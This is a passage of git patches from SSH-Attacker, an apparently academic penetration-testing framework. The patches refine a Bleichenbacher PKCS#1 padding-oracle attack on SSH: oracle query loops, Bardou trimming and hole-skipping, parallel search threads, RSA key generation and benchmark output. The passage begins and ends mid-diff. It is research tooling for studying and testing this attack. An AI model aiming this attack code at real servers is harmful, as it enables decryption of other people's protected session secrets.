{}\n3B - 1: {}\nCiphertext: {}", - bitsize, - k, - B.toString(16), - two_B.toString(16), - three_B.toString(16), - three_B_sub_one.toString(16), - bytesToHex(ciphertext)); - - List M = new ArrayList<>(); - M.add(new Interval(two_B, three_B_sub_one)); - LOGGER.debug( - "M lower: {} M upper: {}", - M.get(0).lower.toString(16), - M.get(0).upper.toString(16)); - - BigInteger s; - - if (!classic) { - // Search for s1 with improved start-conditions from Bardou - M = trimM0(ciphertext, publicKey, null, 1000); - } - - s = - find_smallest_s( - mathHelper.ceil(publicKey.getModulus().add(two_B), M.get(0).upper), - ciphertext, - publicKey); - - LOGGER.debug( - "found s, initial updating M lower: {} M upper: {}", - M.get(0).lower.toString(16), - M.get(0).upper.toString(16)); - - M = updateInterval(M, s, publicKey); - LOGGER.debug("Length: {} M: {}", M.size(), M.toString()); - - while (true) { - if (M.size() >= 2) { - s = find_smallest_s(s.add(BigInteger.ONE), ciphertext, publicKey); - } else if (M.size() == 1) { - BigInteger a = M.get(0).lower; - BigInteger b = M.get(0).upper; - if (a.equals(b)) { - return ArrayConverter.bigIntegerToByteArray(a); - } - s = find_s_in_range(a, b, s, ciphertext, publicKey); - } - M = updateInterval(M, s, publicKey); - } - } - /** * A helper function to create a hex-string from bytes * @@ -604,60 +501,6 @@ private String bytesToHex(byte[] bytes) { return result.toString(); } - private BigInteger[] ensureRange(BigInteger ucandidate, BigInteger tcandidate) { - float quotient = ucandidate.floatValue() / tcandidate.floatValue(); - - // if we get to big - choose next value for t, reset u to 1 - if (quotient >= (3.0F / 2.0F)) { - ucandidate = BigInteger.valueOf(1); - tcandidate = tcandidate.add(BigInteger.ONE); - quotient = ucandidate.floatValue() / tcandidate.floatValue(); - } - // test if wie are too small, add up u until we are above 2/3 - while (quotient <= (2.0F / 3.0F)) { - ucandidate = ucandidate.add(BigInteger.ONE); - quotient = ucandidate.floatValue() / tcandidate.floatValue(); - } - - // return if the range is hold - return new BigInteger[] {ucandidate, tcandidate}; - } - - /** - * Retrieves u/t paires for improved bb attack as mentioned by Bardou 2012 - * - * @param maxPairs the maximum number of pairs to retrieve - * @return an ArrayList of int arrays representing the pairs of integers - */ - private ArrayList getPaires(int maxPairs) { - ArrayList paires = new ArrayList<>(); - BigInteger u = BigInteger.valueOf(1); - BigInteger t = BigInteger.valueOf(2); - - // as long as we are not above t < 2^12 and the max number of paires isn`t reached - go on - // searching - while ((t.compareTo(BigInteger.valueOf(2).pow(12)) < 0) && paires.size() < maxPairs) { - BigInteger[] result = ensureRange(u, t); - u = result[0]; - t = result[1]; - - // while u and t are not coprime - add up u and test again - // every run test if we are in range, otherwise correct - while (u.gcd(t).compareTo(BigInteger.valueOf(1)) != 0) { - u = u.add(BigInteger.ONE); - BigInteger[] result2 = ensureRange(u, t); - u = result2[0]; - t = result2[1]; - } - - // Pair found -> add to paires and add u one up - paires.add(new int[] {u.intValue(), t.intValue()}); - u = u.add(BigInteger.ONE); - } - - return paires; - } - /** * A helper function to remove a PKCS#1-encoded-Padding * diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/MathHelper.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/MathHelper.java index b9513fd5a..bfd9130b5 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/MathHelper.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/MathHelper.java @@ -10,9 +10,7 @@ import java.math.BigInteger; import java.util.ArrayList; -/** - * The MathHelper class provides various mathematical helper methods. - */ +/** The MathHelper class provides various mathematical helper methods. */ public class MathHelper { public MathHelper() {} diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/TrimmerGenerator.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/TrimmerGenerator.java new file mode 100644 index 000000000..2d3b0f07a --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/TrimmerGenerator.java @@ -0,0 +1,70 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2024 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1.util; + +import java.math.BigInteger; +import java.util.ArrayList; + +public class TrimmerGenerator { + + public TrimmerGenerator() {} + + /** + * Retrieves u/t paires for improved bb attack as mentioned by Bardou 2012 + * + * @param maxPairs the maximum number of pairs to retrieve + * @return an ArrayList of int arrays representing the pairs of integers + */ + public ArrayList getPaires(int maxPairs) { + ArrayList paires = new ArrayList<>(); + BigInteger u = BigInteger.valueOf(1); + BigInteger t = BigInteger.valueOf(2); + + // as long as we are not above t < 2^12 and the max number of paires isn`t reached - go on + // searching + while ((t.compareTo(BigInteger.valueOf(2).pow(12)) < 0) && paires.size() < maxPairs) { + BigInteger[] result = ensureRange(u, t); + u = result[0]; + t = result[1]; + + // while u and t are not coprime - add up u and test again + // every run test if we are in range, otherwise correct + while (u.gcd(t).compareTo(BigInteger.valueOf(1)) != 0) { + u = u.add(BigInteger.ONE); + BigInteger[] result2 = ensureRange(u, t); + u = result2[0]; + t = result2[1]; + } + + // Pair found -> add to paires and add u one up + paires.add(new int[] {u.intValue(), t.intValue()}); + u = u.add(BigInteger.ONE); + } + + return paires; + } + + private BigInteger[] ensureRange(BigInteger ucandidate, BigInteger tcandidate) { + float quotient = ucandidate.floatValue() / tcandidate.floatValue(); + + // if we get to big - choose next value for t, reset u to 1 + if (quotient >= (3.0F / 2.0F)) { + ucandidate = BigInteger.valueOf(1); + tcandidate = tcandidate.add(BigInteger.ONE); + quotient = ucandidate.floatValue() / tcandidate.floatValue(); + } + // test if wie are too small, add up u until we are above 2/3 + while (quotient <= (2.0F / 3.0F)) { + ucandidate = ucandidate.add(BigInteger.ONE); + quotient = ucandidate.floatValue() / tcandidate.floatValue(); + } + + // return if the range is hold + return new BigInteger[] {ucandidate, tcandidate}; + } +} From 18ca1a092e442e514c67b91cde2f548771364a73 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 14 Jan 2024 00:10:56 +0100 Subject: [PATCH 128/176] Implementing ParallelThread Improvement from Klima - not really testet now, not in use. --- .../attacks/pkcs1/Bleichenbacher.java | 105 ++++++++++++- .../attacks/pkcs1/Step2cRunner.java | 144 ++++++++++++++++++ 2 files changed, 242 insertions(+), 7 deletions(-) create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Step2cRunner.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 9be20f3c0..514eb8ed2 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -18,6 +18,7 @@ import java.util.ArrayList; import java.util.Arrays; import java.util.List; +import java.util.concurrent.*; import javax.crypto.BadPaddingException; import javax.crypto.Cipher; import javax.crypto.IllegalBlockSizeException; @@ -89,7 +90,99 @@ private BigInteger manipulateCiphertext(BigInteger s, BigInteger e, BigInteger n * @param outerKey the rsa-public-key for the outer encryption, encrypting the generated s-value * @return the smallest s-value, which generates a valid PKCS#1 Ciphertext */ - private BigInteger find_smallest_s( + private BigInteger step2b( + BigInteger lowerBound, + byte[] ciphertext, + CustomRsaPublicKey rsaPublicKey, + CustomRsaPublicKey outerKey) { + + BigInteger s = lowerBound; + boolean oracleResult; + + while (true) { + BigInteger attempt = + manipulateCiphertext( + s, + rsaPublicKey.getPublicExponent(), + rsaPublicKey.getModulus(), + ciphertext); + + if (outerKey != null) { + BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); + + oracleResult = queryOracle(encryptedAttempt, true); + counterInnerBleichenbacher++; + + } else { + oracleResult = queryOracle(attempt, false); + + if (counterOuterBleichenbacher == 0) { + LOGGER.fatal( + ArrayConverter.bytesToHexString( + ArrayConverter.bigIntegerToByteArray(attempt))); + } + counterOuterBleichenbacher++; + } + if (oracleResult) { + LOGGER.fatal( + ArrayConverter.bytesToHexString( + ArrayConverter.bigIntegerToByteArray(attempt))); + return s; + } + + s = s.add(BigInteger.ONE); + } + } + + private BigInteger step2b( + List M, + BigInteger previousS, + byte[] ciphertext, + CustomRsaPublicKey rsaPublicKey, + CustomRsaPublicKey outerKey) { + LOGGER.info("RUNNING Step 2b"); + BigInteger nextS; + ExecutorService executor = Executors.newFixedThreadPool(M.size()); + + List> runners = new ArrayList<>(); + + for (Interval chosenInterval : M) { + Step2cRunner step2cRunner = + new Step2cRunner( + ciphertext, + oracle, + two_B, + three_B, + chosenInterval.lower, + chosenInterval.upper, + previousS, + rsaPublicKey, + outerKey); + runners.add(step2cRunner); + } + + List> results; + try { + results = executor.invokeAll(runners); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + while (true) { + for (Future result : results) { + if (result.isDone()) { + try { + nextS = result.get(); + } catch (InterruptedException | ExecutionException e) { + throw new RuntimeException(e); + } + executor.shutdownNow(); + return nextS; + } + } + } + } + + private BigInteger step2a( BigInteger lowerBound, byte[] ciphertext, CustomRsaPublicKey rsaPublicKey, @@ -145,7 +238,7 @@ private BigInteger find_smallest_s( * @param outerKey the outer encryption key * @return */ - private BigInteger find_s_in_range( + private BigInteger step2c( BigInteger lowerBound, BigInteger upperBound, BigInteger previousS, @@ -456,7 +549,7 @@ private byte[] Bleichenbacher( } s = - find_smallest_s( + step2a( MathHelper.ceil(innerPublicKey.getModulus().add(two_B), M.get(0).upper), ciphertext, innerPublicKey, @@ -472,16 +565,14 @@ private byte[] Bleichenbacher( while (true) { if (M.size() >= 2) { - s = - find_smallest_s( - s.add(BigInteger.ONE), ciphertext, innerPublicKey, outerPublicKey); + s = step2b(s, ciphertext, innerPublicKey, outerPublicKey); } else if (M.size() == 1) { BigInteger a = M.get(0).lower; BigInteger b = M.get(0).upper; if (a.equals(b)) { return ArrayConverter.bigIntegerToByteArray(a); } - s = find_s_in_range(a, b, s, ciphertext, innerPublicKey, outerPublicKey); + s = step2c(a, b, s, ciphertext, innerPublicKey, outerPublicKey); } M = updateInterval(M, s, innerPublicKey); } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Step2cRunner.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Step2cRunner.java new file mode 100644 index 000000000..26eb6884d --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Step2cRunner.java @@ -0,0 +1,144 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2024 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Pkcs1Oracle; +import de.rub.nds.sshattacker.attacks.pkcs1.util.MathHelper; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import java.math.BigInteger; +import java.security.InvalidKeyException; +import java.security.NoSuchAlgorithmException; +import java.util.concurrent.Callable; +import javax.crypto.BadPaddingException; +import javax.crypto.Cipher; +import javax.crypto.IllegalBlockSizeException; +import javax.crypto.NoSuchPaddingException; + +public class Step2cRunner extends Pkcs1Attack implements Callable { + BigInteger two_B; + BigInteger three_B; + BigInteger big_two = BigInteger.TWO; + BigInteger lowerBound; + BigInteger upperBound; + BigInteger previousS; + + CustomRsaPublicKey rsaPublicKey; + CustomRsaPublicKey outerKey; + byte[] ciphertext; + + public Step2cRunner( + byte[] msg, + Pkcs1Oracle pkcsOracle, + BigInteger twoB, + BigInteger threeB, + BigInteger lowerBound, + BigInteger upperBound, + BigInteger previousS, + CustomRsaPublicKey rsaPublicKey, + CustomRsaPublicKey outerKey) { + super(msg, pkcsOracle); + this.two_B = twoB; + this.three_B = threeB; + this.lowerBound = lowerBound; + this.upperBound = upperBound; + this.previousS = previousS; + this.ciphertext = msg; + this.rsaPublicKey = rsaPublicKey; + this.outerKey = outerKey; + } + + private BigInteger manipulateCiphertext(BigInteger s, BigInteger e, BigInteger n, byte[] c) { + BigInteger exponentiated = s.modPow(e, n); + BigInteger cipher = new BigInteger(1, c); + BigInteger res = cipher.multiply(exponentiated); + + return res.mod(n); + } + + private BigInteger step2c( + BigInteger lowerBound, + BigInteger upperBound, + BigInteger previousS, + byte[] ciphertext, + CustomRsaPublicKey rsaPublicKey, + CustomRsaPublicKey outerKey) { + + boolean oracleResult; + // ri = ceil(2 * (b * prev_s - 2 * B), n) + BigInteger bTimesPrevs = upperBound.multiply(previousS); + BigInteger bTimePrevsSubTwoB = bTimesPrevs.subtract(two_B); + BigInteger ri = + MathHelper.ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); + + while (true) { + + // si_lower = ceil(2 * B + ri * n, b) + // si_upper = ceil(3 * B + ri * n, a) + BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); + BigInteger si_lower = MathHelper.ceil(two_B.add(rITimesN), upperBound); + BigInteger si_upper = MathHelper.ceil(three_B.add(rITimesN), lowerBound); + + for (BigInteger si = si_lower; + si.compareTo(si_upper) < 0; + si = si.add(BigInteger.ONE)) { + + BigInteger attempt = + manipulateCiphertext( + si, + rsaPublicKey.getPublicExponent(), + rsaPublicKey.getModulus(), + ciphertext); + + if (outerKey != null) { + BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); + oracleResult = queryOracle(encryptedAttempt, true); + // counterInnerBleichenbacher++; + } else { + oracleResult = queryOracle(attempt, false); + // counterOuterBleichenbacher++; + } + + if (oracleResult) { + return si; + } + } + + ri = ri.add(BigInteger.ONE); + } + } + + private BigInteger encryptBigInt(BigInteger attempt, CustomRsaPublicKey encryptionKey) { + try { + Cipher javaCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + + javaCipher.init(Cipher.ENCRYPT_MODE, encryptionKey); + + return new BigInteger( + javaCipher.doFinal(ArrayConverter.bigIntegerToByteArray(attempt))); + + } catch (InvalidKeyException + | IllegalBlockSizeException + | BadPaddingException + | NoSuchPaddingException + | NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } + } + + @Override + public BigInteger call() throws Exception { + return step2c( + this.lowerBound, + this.upperBound, + this.previousS, + this.ciphertext, + this.rsaPublicKey, + this.outerKey); + } +} From 5271525bb456fa3eceffcaa66527bbe9a0c77208 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 20 Jan 2024 23:19:24 +0100 Subject: [PATCH 129/176] Improved Performance Logging and implement auto key generation if needed - actually a bit buggy --- .../attacks/impl/BleichenbacherAttacker.java | 151 ++++++++++++------ .../attacks/pkcs1/Bleichenbacher.java | 29 +++- 2 files changed, 133 insertions(+), 47 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 241b1c026..269351a1c 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -37,9 +37,7 @@ import java.io.FileOutputStream; import java.io.IOException; import java.math.BigInteger; -import java.security.InvalidKeyException; -import java.security.MessageDigest; -import java.security.NoSuchAlgorithmException; +import java.security.*; import java.util.ArrayList; import java.util.Arrays; import java.util.List; @@ -47,6 +45,7 @@ import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; +import org.json.simple.JSONObject; /** * Sends differently formatted PKCS#1 v2.x messages to the SSH server and observes the server @@ -70,7 +69,7 @@ public class BleichenbacherAttacker extends Attacker 1) { + e = e.add(new BigInteger("2")); + } + d = e.modInverse(phi); + + return new BigInteger[] {e, d, N}; + } + @Override public void executeAttack() { if (!config.getSendSinglePacket().isEmpty()) { @@ -369,6 +391,8 @@ public void executeAttack() { LOGGER.info(sendSinglePacket(msg)); } + boolean randomKeys = false; + this.oracleType = config.getOracleType(); this.keyLenght = config.getKeyLenght(); @@ -396,23 +420,63 @@ public void executeAttack() { getHostPublicKey(); getServerPublicKey(); } else { - switch (keyLenght) { - case SHORT: - serverPrivateKey = this.serverPrivateKey768; - serverPublicKey = this.serverPublicKey768; - hostPrivatKey = this.hostPrivatKey1024; - hostPublicKey = this.hostPublicKey1024; - break; - case LONG: - serverPrivateKey = this.serverPrivateKey1024; - serverPublicKey = this.serverPublicKey1024; - hostPrivatKey = this.hostPrivatKey2048; - hostPublicKey = this.hostPublicKey2048; - break; - default: - LOGGER.fatal( - "Error - you need to choose a valid Keylenght if oracle-Type is not 'real'"); - throw new RuntimeException(); + if (!randomKeys) { + switch (keyLenght) { + case SHORT: + serverPrivateKey = this.serverPrivateKey768; + serverPublicKey = this.serverPublicKey768; + hostPrivateKey = this.hostPrivatKey1024; + hostPublicKey = this.hostPublicKey1024; + break; + case LONG: + serverPrivateKey = this.serverPrivateKey1024; + serverPublicKey = this.serverPublicKey1024; + hostPrivateKey = this.hostPrivatKey2048; + hostPublicKey = this.hostPublicKey2048; + break; + default: + LOGGER.fatal( + "Error - you need to choose a valid Keylenght if oracle-Type is not 'real'"); + throw new RuntimeException(); + } + } else { + int serverKeyLenght, hostKeyLenght; + switch (keyLenght) { + case SHORT: + serverKeyLenght = 768; + hostKeyLenght = 1024; + break; + case LONG: + serverKeyLenght = 1024; + hostKeyLenght = 2048; + break; + default: + LOGGER.fatal( + "Error - you need to choose a valid Keylenght if oracle-Type is not 'real'"); + throw new RuntimeException(); + } + BigInteger[] serverKeyData = RSAKeyPairGenerator(serverKeyLenght); + + serverPrivateKey = new CustomRsaPrivateKey(serverKeyData[1], serverKeyData[2]); + serverPublicKey = new CustomRsaPublicKey(serverKeyData[0], serverKeyData[2]); + + BigInteger[] hostKeyData = RSAKeyPairGenerator(hostKeyLenght); + + hostPrivateKey = new CustomRsaPrivateKey(hostKeyData[1], hostKeyData[2]); + hostPublicKey = new CustomRsaPublicKey(hostKeyData[0], hostKeyData[2]); + + LOGGER.debug( + ArrayConverter.bytesToHexString( + hostPrivateKey.getPrivateExponent().toByteArray())); + LOGGER.debug( + ArrayConverter.bytesToHexString( + hostPublicKey.getPublicExponent().toByteArray())); + LOGGER.debug( + ArrayConverter.bytesToHexString( + serverPrivateKey.getPrivateExponent().toByteArray())); + LOGGER.debug( + ArrayConverter.bytesToHexString( + serverPublicKey.getPublicExponent().toByteArray())); } } @@ -449,7 +513,7 @@ public void executeAttack() { encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); } - if ((encryptedSecret.length * Byte.SIZE) != hostPublicKey.getModulus().bitLength()) { + if ((encryptedSecret.length * Byte.SIZE) > hostPublicKey.getModulus().bitLength()) { throw new ConfigurationException( "The length of the encrypted secret " + "is not equal to the public key length. Have you selected the correct value?"); @@ -476,7 +540,7 @@ public void executeAttack() { oracle = new Ssh1MockOracle( hostPublicKey, - hostPrivatKey, + hostPrivateKey, serverPublicKey, serverPrivateKey, oracleType); @@ -520,31 +584,26 @@ public void executeAttack() { if (config.isBenchmark()) { try { - String str = - String.format( - "{" - + " \"Plaintext\": \"%s\"," - + " \"Ciphertext\": \"%s\"," - + " \"Time\": \"%d\",\n" - + " \"Inner-Tries\": \"%d\"," - + " \"Outer-Tries\": \"%d\"," - + " \"serverkey_lenght\": \"%d\"," - + " \"hostkey_lenght\": \"%d\"," - + " \"oracle_type\": \"%s\"," - + " \"attack_type\": \"%s\"" - + "}", - ArrayConverter.bytesToHexString(solutionByteArray), - ArrayConverter.bytesToHexString(encryptedSecret), - timeElapsed, - attacker.getCounterInnerBleichenbacher(), - attacker.getCounterOuterBleichenbacher(), - serverPublicKey.getModulus().bitLength(), - hostPublicKey.getModulus().bitLength(), - oracleType.toString(), - attackType); + JSONObject jo = new JSONObject(); + jo.put("plaintext", ArrayConverter.bytesToRawHexString(solutionByteArray)); + jo.put("ciphertext", ArrayConverter.bytesToRawHexString(encryptedSecret)); + jo.put("time", timeElapsed); + jo.put("inner-Tries", attacker.getCounterInnerBleichenbacher()); + jo.put("outer-Tries", attacker.getCounterOuterBleichenbacher()); + jo.put("trimmed_outer", attacker.isOuterTrimmed()); + jo.put("trimmed_inner", attacker.isInnerTrimmed()); + jo.put("outer_trimmers", attacker.getOuterTrimmers()); + jo.put("inner_trimmers", attacker.getInnerTrimmers()); + jo.put("serverkey_lenght", serverPublicKey.getModulus().bitLength()); + jo.put("hostkey_lenght", hostPublicKey.getModulus().bitLength()); + jo.put("oracle_type", oracleType.toString()); + jo.put("attack_type", attackType); + + String jsonStr = jo.toJSONString(); + File output_File = new File("benchmark_results.txt"); FileOutputStream outputStream = new FileOutputStream(output_File, true); - byte[] strToBytes = str.getBytes(); + byte[] strToBytes = jsonStr.getBytes(); outputStream.write(strToBytes); outputStream.close(); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 514eb8ed2..9a50493eb 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -44,6 +44,11 @@ public class Bleichenbacher extends Pkcs1Attack { private int counterInnerBleichenbacher; private int counterOuterBleichenbacher; + private boolean innerTrimmed = false; + private boolean outerTrimmed = false; + private int innerTrimmers = 5000; + private int outerTrimmers = 1000; + /** * @param msg The message that should be decrypted with the attack * @param pkcsOracle The oracle to be queried @@ -500,6 +505,12 @@ private List trimM0( M.add(new Interval(a, b)); LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); + if (outerPublicKey != null) { + innerTrimmed = true; + } else { + outerTrimmed = true; + } + } else { LOGGER.debug("utPaires where empty, falling back to 2B and 3B-1"); M = new ArrayList<>(); @@ -543,7 +554,7 @@ private byte[] Bleichenbacher( M.get(0).lower.toString(16), M.get(0).upper.toString(16)); if (!classic) { - int maxTrimmes = outerPublicKey != null ? 5000 : 1000; + int maxTrimmes = outerPublicKey != null ? innerTrimmers : outerTrimmers; M = trimM0(ciphertext, innerPublicKey, outerPublicKey, maxTrimmes); } @@ -652,4 +663,20 @@ public int getCounterInnerBleichenbacher() { public int getCounterOuterBleichenbacher() { return counterOuterBleichenbacher; } + + public boolean isInnerTrimmed() { + return innerTrimmed; + } + + public boolean isOuterTrimmed() { + return outerTrimmed; + } + + public int getInnerTrimmers() { + return innerTrimmers; + } + + public int getOuterTrimmers() { + return outerTrimmers; + } } From 78f78861eab67f5a852ef74c1cac6920a94fd7e4 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 3 Feb 2024 00:51:24 +0100 Subject: [PATCH 130/176] fix deadlock in step 2b and improve logging --- .../rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 9a50493eb..5134b5b6e 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -122,6 +122,7 @@ private BigInteger step2b( oracleResult = queryOracle(attempt, false); if (counterOuterBleichenbacher == 0) { + LOGGER.fatal("first"); LOGGER.fatal( ArrayConverter.bytesToHexString( ArrayConverter.bigIntegerToByteArray(attempt))); @@ -129,6 +130,7 @@ private BigInteger step2b( counterOuterBleichenbacher++; } if (oracleResult) { + LOGGER.fatal("2b"); LOGGER.fatal( ArrayConverter.bytesToHexString( ArrayConverter.bigIntegerToByteArray(attempt))); @@ -214,6 +216,7 @@ private BigInteger step2a( oracleResult = queryOracle(attempt, false); if (counterOuterBleichenbacher == 0) { + LOGGER.fatal("first"); LOGGER.fatal( ArrayConverter.bytesToHexString( ArrayConverter.bigIntegerToByteArray(attempt))); @@ -221,6 +224,7 @@ private BigInteger step2a( counterOuterBleichenbacher++; } if (oracleResult) { + LOGGER.fatal("2a"); LOGGER.fatal( ArrayConverter.bytesToHexString( ArrayConverter.bigIntegerToByteArray(attempt))); @@ -576,7 +580,7 @@ private byte[] Bleichenbacher( while (true) { if (M.size() >= 2) { - s = step2b(s, ciphertext, innerPublicKey, outerPublicKey); + s = step2b(s.add(BigInteger.ONE), ciphertext, innerPublicKey, outerPublicKey); } else if (M.size() == 1) { BigInteger a = M.get(0).lower; BigInteger b = M.get(0).upper; From 3b90e1ee22a273e98e8e258b00d298795e556dbb Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 11 Feb 2024 00:49:15 +0100 Subject: [PATCH 131/176] fixing parrallel threads and implementing skipping holes --- .../attacks/impl/BleichenbacherAttacker.java | 66 +----- .../attacks/pkcs1/Bleichenbacher.java | 218 ++++++++++++++---- .../sshattacker/attacks/pkcs1/Interval.java | 16 ++ .../pkcs1/oracles/BleichenbacherOracle.java | 50 +++- .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 23 +- .../core/config/delegate/GeneralDelegate.java | 5 + .../core/crypto/cipher/CipherFactory.java | 4 +- 7 files changed, 260 insertions(+), 122 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 269351a1c..f3286acf7 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -75,79 +75,31 @@ public class BleichenbacherAttacker extends Attacker genState( + List M, BigInteger previousS, CustomRsaPublicKey rsaPublicKey) { + + // Arrayliste aus einem array Bigintegers + + ArrayList state = new ArrayList<>(); + + // für jedes M + for (Interval interval : M) { + BigInteger upperBound = interval.getUpper(); + BigInteger bTimesPrevS = upperBound.multiply(previousS); + BigInteger bTimePrevsSubTwoB = bTimesPrevS.subtract(two_B); + BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); + + BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); + BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); + state.add(new BigInteger[] {si_lower, ri}); + } + + return state; + } + private BigInteger step2b( List M, BigInteger previousS, @@ -148,57 +172,107 @@ private BigInteger step2b( CustomRsaPublicKey rsaPublicKey, CustomRsaPublicKey outerKey) { LOGGER.info("RUNNING Step 2b"); - BigInteger nextS; - ExecutorService executor = Executors.newFixedThreadPool(M.size()); - List> runners = new ArrayList<>(); + LOGGER.info("the array has {} items", M.size()); - for (Interval chosenInterval : M) { - Step2cRunner step2cRunner = - new Step2cRunner( - ciphertext, - oracle, - two_B, - three_B, - chosenInterval.lower, - chosenInterval.upper, - previousS, - rsaPublicKey, - outerKey); - runners.add(step2cRunner); - } + ArrayList states = new ArrayList<>(); + states = genState(M, previousS, rsaPublicKey); - List> results; - try { - results = executor.invokeAll(runners); - } catch (InterruptedException e) { - throw new RuntimeException(e); - } while (true) { - for (Future result : results) { - if (result.isDone()) { - try { - nextS = result.get(); - } catch (InterruptedException | ExecutionException e) { - throw new RuntimeException(e); - } - executor.shutdownNow(); - return nextS; + // für jedes M nach index + for (int i = 0; i < M.size(); i++) { + LOGGER.info("running in {}", i); + BigInteger a = M.get(i).lower; + BigInteger b = M.get(i).upper; + BigInteger currentS = states.get(i)[0]; + BigInteger r = states.get(i)[1]; + BigInteger[] results = + step2cSingle(a, b, currentS, r, ciphertext, rsaPublicKey, outerKey); + + BigInteger success = results[0]; + currentS = results[1]; + r = results[2]; + + if (success.compareTo(BigInteger.ONE) == 0) { + return currentS; + } else { + states.get(i)[0] = currentS; + states.get(i)[1] = r; } } } } + /** + * Implements "Skipping Holes" from Bardou, tests if s may be valid, returns if true or skips to + * the next valid s if false + * + * @param s The value to be checked. + * @param j Incrementor for the Holes + * @param low The lower bound of the range. + * @param high The upper bound of the range. + * @return The updated value of 's' to be used in the next iteration. + */ + private BigInteger[] checkAndSkipS( + BigInteger s, + BigInteger j, + BigInteger low, + BigInteger high, + CustomRsaPublicKey publicKey, + Interval M) { + while (true) { + if (s.compareTo(low) >= 0 && s.compareTo(high) <= 0) { + s = high.add(BigInteger.ONE); + } else if (low.compareTo(high) > 0) { + return new BigInteger[] {s, BigInteger.ZERO, BigInteger.ZERO, BigInteger.ZERO}; + } else if (s.compareTo(low) < 0) { + return new BigInteger[] {s, j, high, low}; + } + j = j.add(BigInteger.ONE); + low = ceil(three_B.add(j.multiply(publicKey.getModulus())), M.lower); // ceil(3*B+j*n,a) + high = + ceil( + two_B.add( + (j.add(BigInteger.ONE) + .multiply(publicKey.getModulus()))), + M.upper) + .subtract(BigInteger.ONE); // ceil(2*B+(j+1)*n,b)-1 + } + } + private BigInteger step2a( BigInteger lowerBound, byte[] ciphertext, CustomRsaPublicKey rsaPublicKey, - CustomRsaPublicKey outerKey) { + 